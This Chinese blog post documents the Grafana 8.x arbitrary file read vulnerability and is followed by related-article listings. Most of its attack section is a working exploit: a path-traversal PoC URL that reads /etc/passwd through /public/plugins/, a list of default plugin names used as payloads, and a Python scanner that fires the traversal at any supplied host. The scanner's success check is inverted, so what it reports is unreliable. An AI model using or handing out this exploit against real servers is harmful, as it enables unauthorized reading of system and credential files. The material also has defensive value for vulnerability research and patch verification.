Grafana任意文件读取

最新推荐文章于 2024-04-26 15:59:31 发布
最新推荐文章于 2024-04-26 15:59:31 发布
阅读量4.9k 收藏
点赞数 1
文章标签: 安全 web安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chiza2596/article/details/121792641
版权

Grafana任意文件读取

漏洞描述

Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件

影响版本

Grafana 8.x

漏洞复现

POC

HTTP://XXX.XXX.XXX.XXX/public/plugins/插件名称/../../../../../../../../../etc/passwd

paload.txt

alertmanager
grafana
loki
postgres
grafana-azure-monitor-datasource
mixed
prometheus
cloudwatch
graphite
mssql
tempo
dashboard
influxdb
mysql
testdata
elasticsearch
jaeger
opentsdb
zipkin
alertGroups
bargauge
debug
graph
live
piechart
status-history
timeseries
alertlist
candlestick
gauge
heatmap
logs
pluginlist
table
welcome
annolist
canvas
geomap
histogram
news
stat
table-old
xychart
barchart
dashlist
gettingstarted
icon
nodeGraph
state-timeline
text

image-20211208152159118

检测脚本

import requests
import sys
 
args = str(sys.argv[1])
f = open("./paload.txt")
for line in f:
    url = "http://"+args+"/public/plugins/"+str.rstrip(line)+"/../../../../../../../../../../../etc/passwd"
    headers = {
        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
    }
    req = requests.post(url, headers=headers,timeout=(3,7),allow_redirects=False)
    a=req.text
    str1='root'
    if a in str1:
        print('确认存在'+str.rstrip(line)+'路径,并存在漏洞!')
        print(url)
    else:
        print('不存在漏洞!')

小陈是个憨憨
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
centos7下布署Prometheus+Grafana超炫监控.txt
01-17
centos7下布署Prometheus+Grafana超炫监控,可以通过图形化界面监控数据库,服务器还可以进行报警功能,功能强大,界面优美
K8S部署grafana7.5.11资源清单及镜像文件
01-04
原文链接:https://blog.csdn.net/m0_37814112/article/details/122170537 说明:grafana7.5.11镜像文件及资源清单文件,后端存储采用nfs
2022 年 Kubernetes 高危漏洞盘点
u012516914的专栏
12-17 847
2022 年,Kubernetes继续巩固自己作为关键基础设施领域的地位。从小型到大型组织,它已成为广受欢迎的选择。出于显而易见的原因,这种转变使 Kubernetes 更容易受到攻击。但这还没有结束,开发人员通常将Kubernetes 部署与其他云原生组件一起使用来构建一个完善的工作系统。不幸的是,这种组合会导致具有更多组件的更复杂的基础架构。这最终会增加易受攻击的表面积和范围。根据 Red H...
Grafana 漏洞可导致管理员账户遭接管
smellycat000的专栏
07-25 1088
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士研究人员提醒称,Grafana 的OAuth 登录功能中存在一个漏洞 (CVE-2022-31107),可导致管理员账户遭接管。该漏洞可导致攻击者访问 Grafana 开源分析平台上其它用户的账户。该漏洞是由 HTTPVoid 公司的研究员发现的,位于该平台的登录功能中,“可导致攻击者通过针对运行易受攻击 Grafana...
学习笔记-B/S - Exploits
人饭子的博客
11-02 9713
B/S - Exploits 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 各类论坛/CMS框架 AEM 74CMS dedeCMS Discuz Discuz Discuz!ML Drupal ECshop Fastadmin Laravel jeecg jeewms Joomla Maccms MetIn...
漏洞复现】Grafana任意文件读取漏洞(CVE-2021-43798)_grafana漏洞复现
2401_84437170的博客
04-17 231
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。
Grafana 如何使用本地CSV文件作为数据源
jimmyleeee的专栏
03-07 2961
我是在本地使用命令行grafana-cli plugins install marcusolsson-csv-datasource安装的。重启Grafana之后,在Grafana的主页,在Configuration里如果能够看到CSV,就说明安装成功了。然后再重启一下grafana服务,就可以创建本地CSV数据源并且使用此数据源了。再转到[Data Source]界面添加数据源,可以看到有CSV选项了。安装之后,需要重启一下Grafana服务才可以加载进来。点击CSV插件,可以添加CSV数据源。
Grafana任意文件读取 (CVE-2021-43798)
weixin_63231007的博客
10-07 936
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件
grafana安装部署、自定义主题、dashboard模板导入
热门推荐
ll535299的博客
10-26 1万+
Grafana 是一个跨平台的开源的度量分析和可视化工具,可以通过将采集的数据查询然后可视化的展示,并及时通知。官网地址::快速灵活的客户端图表,面板插件有许多不同方式的可视化指标和日志,官方库中具有丰富的仪表盘插件,比如热图、折线图、图表等多种展示方式;:Graphite,InfluxDB,OpenTSDB,Prometheus,Elasticsearch,CloudWatch和KairosDB等;
prometheus+grafana漏洞汇总
qq_44657899的博客
02-23 1万+
文章目录基本介绍grafanaprometheus 基本介绍 prometheus+grafana一般合起来用,作用是监控 以下介绍部分参考:prometheus+grafana监控设置 Prometheus(普罗米修斯)是一套开源的监控&报警&时间序列数据库的组合,起始是由SoundCloud公司开发的。随着发展,越来越多公司和组织接受采用Prometheus,社会也十分活跃,他们便将它独立成开源项目,并且有公司来运作。Google SRE的书内也曾提到跟他们BorgMon监控系统相似的实
grafana.txt
03-10
grafana-7.4.1-1.x86_64.rpm
泛微云桥 e-Bridge 任意文件读取.md
04-11
泛微云桥 e-Bridge 任意文件读取
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
Adminer≤4.6.2任意文件读取漏洞1
08-03
Adminer≤4.6.2 任意读取漏洞0x01 前SQLite、PostgreSQL 等众多主流数据库,类似于 phpMyAdmin 的 MySQL 管理客
jQuery-1.7.2任意文件读取漏洞验证利用脚本
04-27
jQuery是一个快速、简洁的JavaScript框架,丰富的Javascript代码库,在其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件
nc57-任意文件读取漏洞补丁
06-08
nc57_任意文件读取漏洞补丁
如何在Android应用中安全地使用SQLite数据库,并通过SQLCipher进行加密保护
轻描时光
04-23 63
Android内置SQLite轻量级关系型数据库,可以在Android应用中存储、检索和管理结构化数据。SQLite是一个无服务器的、零配置的、事务性的SQL数据库引擎,非常适合用于移动设备和桌面应用程序中。:SQLite不需要单独的服务器进程或操作系统级别的配置。可以直接读写磁盘上的文件,非常高效且适合在资源有限的移动设备上使用。:SQLite支持ACID事务,提供了原子性、一致性、隔离性和持久性。保证了即使在发生故障的情况下,数据的完整性也能得到维护。
安装SSL证书之后还会有不安全提示怎么办?
JoySSL230907的博客
04-20 801
在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。- 证书链完整性:确保您不仅安装了主证书,还包含了所有必要的中间证书。缺少中间证书可能导致浏览器认为证书不可信。- 清除浏览器缓存:浏览器可能缓存了旧的或错误的证书信息,清除缓存有助于加载新安装的证书。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。
严把质量关,饮片追溯系统应用,信息化追溯助力用药安全-亿发
最新发布
YIFARJ的博客
04-26 118
随着国家政策的持续推动和各地的积极响应,相信中药饮片追溯系统将在未来发挥更加重要的作用,有助于中药饮片行业提升质量水平,净化市场环境,增强消费者对中药饮片的信任度,促进中医药产业的健康发展和可持续性增长。追溯体系可以追踪和记录药材的种植、采集、加工等全过程信息,为质量监管提供数据支持,有效防止低质量或假冒伪劣药材进入市场,保障中药饮片的品质。通过建立追溯体系,消费者可以查询药材的来源、加工过程和质量检测等关键信息,选择可靠的中药产品,提高用药安全性,避免因药材质量问题导致的用药风险。
shopxo download 任意文件读取漏洞
09-02
然而,它也存在一些安全漏洞,包括任意文件读取漏洞。这个漏洞可能会使攻击者能够读取服务器上的任意文件,包括敏感的配置文件和用户数据。 要利用shopxo download任意文件读取漏洞,攻击者通常会构造特定的URL请求...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值